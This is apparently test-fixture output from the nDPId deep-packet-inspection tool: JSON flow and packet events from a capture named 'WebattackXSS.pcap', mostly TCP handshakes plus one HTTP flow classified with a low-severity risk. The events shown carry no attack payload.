+00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347091102,"flow_last_seen":1499347091102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347091102,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1499347091102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347091102,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uhVAAD4GC7usEAABwKgKMtEMAFDkONpnAAAAAKACchBtWwAAAgQFtAQCCAoBOWByAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1499347091102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347091102,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0QySpl9e5DjaaKAScSBGaQAAAgQFtAQCCAoD4zHpATlgcgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1499347091103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347091103,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uhZAAD4GC8KsEAABwKgKMtEMAFDkONpokqZfX4AQAOXlcAAAAQEICgE5YHID4zHp"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1065,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347092374,"flow_last_seen":1499347092374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347092374,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1065,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1499347092374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347092374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rL1AAD4GGROsEAABwKgKMtEaAFBpN80NAAAAAKACchD0agAAAgQFtAQCCAoBOWGwAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1499347092375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347092375,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0RpaHI+7aTfNDqAScSDUZwAAAgQFtAQCCAoD4zMnATlhsAEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1499347092375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347092375,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rL5AAD4GGRqsEAABwKgKMtEaAFBpN80OWhyPvIAQAOVzbwAAAQEICgE5YbAD4zMn"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347093662,"flow_last_seen":1499347093662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347093662,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1499347093662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347093662,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ku9AAD4GmuGsEAABwKgKMtEoAFAtsEgdAAAAAKACchCzkgAAAgQFtAQCCAoBOWLyAAAAAAEDAwc="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1499347093662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347093662,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Shd8PQZLbBIHqAScSAqGwAAAgQFtAQCCAoD4zRpATli8gEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1499347093663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347093663,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KvBAAD4GmuisEAABwKgKMtEoAFAtsEgeXfD0GoAQAOXJIgAAAQEICgE5YvID4zRp"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347096201,"flow_last_seen":1499347096201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347096201,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1499347096201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347096201,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZsxAAD4GXwSsEAABwKgKMtFCAFCngwOhAAAAAKACchB7pgAAAgQFtAQCCAoBOWVtAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1499347096202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347096202,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0UJnxk6+p4MDoqAScSCLOQAAAgQFtAQCCAoD4zbkATllbQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1499347096202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347096202,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Zs1AAD4GXwusEAABwKgKMtFCAFCngwOiZ8ZOv4AQAOUqQQAAAQEICgE5ZW0D4zbk"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347097460,"flow_last_seen":1499347097460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347097460,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1499347097460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347097460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83YdAAD4G6EisEAABwKgKMtFQAFAbC7sgAAAAAKACchBPVwAAAgQFtAQCCAoBOWanAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1499347097460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347097460,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0VBz69jzGwu7IaAScSDHVQAAAgQFtAQCCAoD4zgeATlmpwEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1499347097460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347097460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03YhAAD4G6E+sEAABwKgKMtFQAFAbC7shc+vY9IAQAOVmXAAAAQEICgE5ZqgD4zge"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347098746,"flow_last_seen":1499347098746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347098746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1499347098746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347098746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gixAAD4GQ6SsEAABwKgKMtFeAFA\/7+XFAAAAAKACchD+fQAAAgQFtAQCCAoBOWfpAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1499347098746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347098746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0V6c5l18P+\/lxqAScSDHtgAAAgQFtAQCCAoD4zlgATln6QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1499347098747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347098747,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gi1AAD4GQ6usEAABwKgKMtFeAFA\/7+XGnOZdfYAQAOVmvgAAAQEICgE5Z+kD4zlg"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347101314,"flow_last_seen":1499347101314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347101314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1499347101314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HlBAAD4Gp4CsEAABwKgKMtF4AFDPTHQ7AAAAAKACchDeDgAAAgQFtAQCCAoBOWprAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1499347101314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0XjCGItuz0x0PKAScSBRoQAAAgQFtAQCCAoD4zviATlqawEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1499347101315,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347101315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HlFAAD4Gp4esEAABwKgKMtF4AFDPTHQ8whiLb4AQAOXwqAAAAQEICgE5amsD4zvi"} 
+00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347102609,"flow_last_seen":1499347102609,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347102609,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1499347102609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ux5AAD4GCrKsEAABwKgKMtGGAFBKzdCxAAAAAKACchAExgAAAgQFtAQCCAoBOWuvAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1499347102609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0YYGn50FSs3QsqAScSAg+AAAAgQFtAQCCAoD4z0lATlrrwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1499347102610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347102610,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ux9AAD4GCrmsEAABwKgKMtGGAFBKzdCyBp+dBoAQAOW\/\/wAAAQEICgE5a68D4z0l"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347105154,"flow_last_seen":1499347105154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347105154,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1499347105154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347105154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eX9AAD4GTFGsEAABwKgKMtGgAFC6fhdUAAAAAKACchBL3AAAAgQFtAQCCAoBOW4rAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1499347105154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347105154,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0aA4hAGdun4XVaAScSDPFAAAAgQFtAQCCAoD4z+iATluKwEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1499347105154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347105154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eYBAAD4GTFisEAABwKgKMtGgAFC6fhdVOIQBnoAQAOVuHAAAAQEICgE5bisD4z+i"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347106438,"flow_last_seen":1499347106438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347106438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1499347106438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347106438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kWRAAD4GNGysEAABwKgKMtGuAFDha\/4IAAAAAKACchA86wAAAgQFtAQCCAoBOW9sAAAAAAEDAwc="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1499347106438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347106438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0a4RPd924Wv+CaAScSAIUAAAAgQFtAQCCAoD40DjATlvbAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1499347106439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347106439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kWVAAD4GNHOsEAABwKgKMtGuAFDha\/4JET3fd4AQAOWnVwAAAQEICgE5b2wD40Dj"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347107719,"flow_last_seen":1499347107719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347107719,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1499347107719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMdAAD4GrQmsEAABwKgKMtG8AFANSWhrAAAAAKACchClXQAAAgQFtAQCCAoBOXCsAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1499347107719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0byrN2AMDUlobKAScSBU8gAAAgQFtAQCCAoD40IjATlwrAEDAwc="} 